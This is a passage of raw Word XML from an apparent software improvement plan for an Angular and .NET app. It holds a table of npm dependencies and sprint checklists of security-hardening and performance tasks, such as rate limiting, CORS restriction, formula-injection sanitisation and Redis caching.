            <w:tcW w:type="dxa" w:w="12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17.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Side effects for NgRx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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npm i @ngrx/effects</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@ngrx/entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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17.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Normalised entity state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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npm i @ngrx/entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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@ngrx/store-devtools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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17.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Time-travel debugging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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npm i @ngrx/store-devtools</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@angular/cdk/a11y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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17.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Focus management utilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Already in @angular/cdk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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@sentry/angular</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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8.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Frontend error monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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npm i @sentry/angular</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date-fns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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Reliable date manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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npm i date-fns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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zod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Runtime API response validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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npm i zod</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@playwright/test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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1.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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E2E browser testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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npm i -D @playwright/test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 10 — Sprint Delivery Checklist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this section as the definitive task list for each sprint. Each item maps directly to a section in this document for implementation details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 1 — Security &amp; Stability (Weeks 1–2)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Move secrets to User Secrets / env variables</w:t>
            </w:r>
          </w:p>
        </w:tc>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§1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add rate limiting on /api/auth/login and /register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Restrict CORS to known production origins</w:t>
            </w:r>
          </w:p>
        </w:tc>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§1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add HTTPS redirect + security headers middleware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add Excel input sanitization for formula injection</w:t>
            </w:r>
          </w:p>
        </w:tc>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§1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Split Services.cs into 7 individual service files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create PolicyConstants.cs and replace magic strings</w:t>
            </w:r>
          </w:p>
        </w:tc>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§3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add GlobalErrorHandler to Angular app.config.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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1.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Fix FamilyMemberService.GetByIdAsync null! return</w:t>
            </w:r>
          </w:p>
        </w:tc>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§3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 2 — Performance (Weeks 3–4)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create sp_GetDashboardStats stored procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>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§2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Update DashboardService to use single SP call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add Redis and cache InvestmentForecastService</w:t>
            </w:r>
          </w:p>
        </w:tc>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§2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Replace per-row AnyAsync with HashSet pre-load</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Implement BulkInsertAsync for Excel import</w:t>
            </w:r>
          </w:p>
        </w:tc>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§2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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2.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Fix NotificationService subscription leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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2.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Fix Chart destroy/recreate → use chart.update()</w:t>
            </w:r>
          </w:p>
        </w:tc>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§2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Change policy list default pageSize to 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
